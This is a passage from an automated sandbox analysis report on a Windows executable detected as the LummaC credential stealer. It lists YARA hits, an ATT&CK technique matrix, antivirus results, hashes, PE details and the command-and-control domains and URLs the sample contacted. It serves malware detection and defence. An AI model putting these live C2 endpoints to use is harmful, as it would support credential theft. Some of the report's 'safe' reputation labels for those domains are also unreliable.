              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000000.00000003.2095048923.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2095154387.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Lisect_AVT_24003_G1B_131.exe PID: 4424, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Credential API Hooking              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information              		1
              Credential API Hooking              		11
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares31
              Data from Local System              		113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets112
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Lisect_AVT_24003_G1B_131.exe50%ReversingLabsWin32.Trojan.Generic
              Lisect_AVT_24003_G1B_131.exe100%AviraTR/Redcap.yoqqs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://sectigo.com/CPS00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              edurestunningcrackyow.fun0%Avira URL Cloudsafe
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              problemregardybuiwo.fun0%Avira URL Cloudsafe
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://resergvearyinitiani.shop/0%Avira URL Cloudsafe
              pooreveningfuseor.pw0%Avira URL Cloudsafe
              https://resergvearyinitiani.shop/api100%Avira URL Cloudmalware
              technologyenterdo.shop100%Avira URL Cloudmalware
              associationokeo.shop100%Avira URL Cloudmalware
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              turkeyunlikelyofw.shop100%Avira URL Cloudmalware
              detectordiscusser.shop100%Avira URL Cloudmalware
              http://www.microsoft.0%Avira URL Cloudsafe
              https://resergvearyinitiani.shop/apik0%Avira URL Cloudsafe
              resergvearyinitiani.shop0%Avira URL Cloudsafe
              lighterepisodeheighte.fun0%Avira URL Cloudsafe
              https://resergvearyinitiani.shop/f0%Avira URL Cloudsafe
              https://resergvearyinitiani.shop/))0%Avira URL Cloudsafe
              https://resergvearyinitiani.shop/apiW0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              resergvearyinitiani.shop
              		188.114.97.3
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                edurestunningcrackyow.funtrue
                • Avira URL Cloud: safe
                		unknown
                problemregardybuiwo.funtrue
                • Avira URL Cloud: safe
                		unknown
                technologyenterdo.shoptrue
                • Avira URL Cloud: malware
                		unknown
                pooreveningfuseor.pwtrue
                • Avira URL Cloud: safe
                		unknown
                associationokeo.shoptrue
                • Avira URL Cloud: malware
                		unknown
                https://resergvearyinitiani.shop/apitrue
                • Avira URL Cloud: malware
                		unknown
                turkeyunlikelyofw.shoptrue
                • Avira URL Cloud: malware
                		unknown
                detectordiscusser.shoptrue
                • Avira URL Cloud: malware
                		unknown
                resergvearyinitiani.shoptrue
                • Avira URL Cloud: safe
                		unknown
                lighterepisodeheighte.funtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://sectigo.com/CPS0Lisect_AVT_24003_G1B_131.exefalse
                • URL Reputation: safe
                		unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.icoLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.sectigo.com0Lisect_AVT_24003_G1B_131.exefalse
                • URL Reputation: safe
                		unknown
                https://resergvearyinitiani.shop/Lisect_AVT_24003_G1B_131.exe, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.rootca1.amazontrust.com/rootca1.crl0Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.microsoft.Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206913461.0000000000762000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207870757.0000000000763000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://ocsp.rootca1.amazontrust.com0:Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecosia.org/newtab/Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://resergvearyinitiani.shop/apikLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095048923.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2095154387.0000000000745000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tLisect_AVT_24003_G1B_131.exefalse
                • URL Reputation: safe
                		unknown
                https://resergvearyinitiani.shop/fLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://x1.c.lencr.org/0Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://x1.i.lencr.org/0Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Lisect_AVT_24003_G1B_131.exefalse
                • URL Reputation: safe
                		unknown
                https://resergvearyinitiani.shop/apiWLisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000707000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crt.rootca1.amazontrust.com/rootca1.cer0?Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2125390423.0000000003763000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://support.mozilla.org/products/firefoxgro.allLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2126524256.000000000386F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098116339.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108768484.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096411133.0000000003751000.00000004.00000800.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2108038846.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2096491527.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2098607322.00000000007F3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://resergvearyinitiani.shop/))Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207529034.0000000000750000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://resergvearyinitiani.shop/apiKLisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206848026.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000003.2206700625.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AF000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  188.114.97.3
                  		resergvearyinitiani.shopEuropean Union
                  		13335CLOUDFLARENETUStrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1481247
                  Start date and time:2024-07-25 06:31:19 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 43s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Lisect_AVT_24003_G1B_131.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                  EGA Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target Lisect_AVT_24003_G1B_131.exe, PID 4424 because there are no executed function
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryDirectoryFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: Lisect_AVT_24003_G1B_131.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  00:32:14API Interceptor7x Sleep call for process: Lisect_AVT_24003_G1B_131.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.97.3http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerrorGet hashmaliciousHTMLPhisherBrowse
                  • kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
                  Quotation.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/jk8Z5I
                  NUEVO ORDEN01_202407238454854.pdf.exeGet hashmaliciousFormBookBrowse
                  • www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
                  DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                  • tny.wtf/cyd
                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                  • filetransfer.io/data-package/4jaIXkvS/download
                  QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                  • filetransfer.io/data-package/PM6yPStj/download
                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                  • filetransfer.io/data-package/0DmcWsUI/download
                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                  • filetransfer.io/data-package/4jaIXkvS/download
                  QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                  • filetransfer.io/data-package/PM6yPStj/download
                  Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • tny.wtf/Dl

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  resergvearyinitiani.shopCDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.21.94.2
                  SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 172.67.217.100
                  SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 172.67.217.100
                  WAhYftpepO.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 172.67.217.100
                  BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                  • 104.21.94.2
                  6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                  • 104.21.94.2
                  vHpxL6E2sQ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                  • 172.67.217.100
                  Vjt694rffx.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                  • 172.67.217.100
                  file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                  • 104.21.94.2
                  wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                  • 104.21.94.2

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSLisect_AVT_24003_G1B_57.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  Lisect_AVT_24003_G1B_5.exeGet hashmaliciousUnknownBrowse
                  • 172.64.41.3
                  https://emea.dcv.ms/V1nd75OZS4Get hashmaliciousHTMLPhisherBrowse
                  • 172.67.173.197
                  Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                  • 104.18.20.226
                  Lisect_AVT_24003_G1B_24.exeGet hashmaliciousUnknownBrowse
                  • 162.159.61.3
                  Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                  • 172.67.70.65
                  DD Spotify Acc Gen.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                  • 162.159.138.232
                  Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                  • 104.20.86.8
                  Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                  • 172.67.70.65
                  Lisect_AVT_24003_G1A_84.exeGet hashmaliciousBdaejecBrowse
                  • 104.20.4.235

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e1Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                  • 188.114.97.3
                  Lisect_AVT_24003_G1A_84.exeGet hashmaliciousBdaejecBrowse
                  • 188.114.97.3
                  LisectAVT_2403002B_493.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  LisectAVT_2403002B_493.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  LisectAVT_2403002B_473.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  LisectAVT_2403002B_120.exeGet hashmaliciousBdaejec, RaccoonBrowse
                  • 188.114.97.3
                  LisectAVT_2403002A_270.exeGet hashmaliciousBlackMoonBrowse
                  • 188.114.97.3
                  tGnix5uKlr.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  JJY.exeGet hashmaliciousBdaejecBrowse
                  • 188.114.97.3
                  tGnix5uKlr.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.834816988012452
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Lisect_AVT_24003_G1B_131.exe
                  File size:6'602'847 bytes
                  MD5:a2860db7149c32113ae0e57f4b3ab327
                  SHA1:6030980c88afc150475570118adb6fc5864ce27f
                  SHA256:e4e908772ae91c05f1f95ef06e1d70981db266c18717228da99d02df555b5725
                  SHA512:10b4a8dbac316a80c936fda31b15c54cf025a535787d04472c9931c0d22054a5d9c334d33577b4322f0cd3b83a1a20239f77cf774ac64885e98cfcc6544fd144
                  SSDEEP:196608:Vggwt0dDSNIB4Rmg2bjZYdyDhAGMlPIEPqAUcO/7RlHT:q1DIB4RmgvAWJBL2P
                  TLSH:42660193BA848D93C8561B34A847E09869F07C5B7F63A68373447B5E78733C0767638A
                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....-.e.................D..........r.............@.................................+.d...@...................................q....

                  File Icon

                  Icon Hash:07f3e3b3b3bba8ab

                  Static PE Info

                  General

                  Entrypoint:0xcdd372
                  Entrypoint Section:.&u&u
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x65D22D96 [Sun Feb 18 16:17:26 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:e317213dc6ffdcf0cccd57a171beb77d

                  Authenticode Signature

                  Signature Valid:
                  Signature Issuer:
                  Signature Validation Error:
                  Error Number:
                  Not Before, Not After
                    Subject Chain
                      Version:
                      Thumbprint MD5:
                      Thumbprint SHA-1:
                      Thumbprint SHA-256:
                      Serial:

                      Entrypoint Preview

                      Instruction
                      call 00007F4548A9B509h
                      jmp 00007F4548A5A486h
                      mov es, word ptr [bp+di]
                      dec edi
                      jmp far E718h : 9DA59480h
                      mov esp, dword ptr [edx+edx*2+62521BA3h]
                      ret
                      stosb
                      mov byte ptr [82CAABA5h], al
                      pop ds
                      or cl, byte ptr [edx-5Ch]
                      xor esp, dword ptr [esi+22h]
                      jnle 00007F4548C078A5h
                      jle 00007F4548C078FEh
                      pushad
                      movsd
                      mov eax, dword ptr [2355E443h]
                      jnl 00007F4548C0794Bh
                      mov ah, ACh
                      or dh, byte ptr [edx+1B8D9E05h]
                      jmp 00007F44EF88A397h
                      jnl 00007F4548C0786Fh
                      jle 00007F4548C0793Ah
                      jne 00007F4548C078EAh
                      mov al, 69h
                      sub al, 9Ch
                      insd
                      jmp 00007F45C2B9C0D9h
                      cmp eax, 6261FAEBh
                      xchg eax, ebx

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
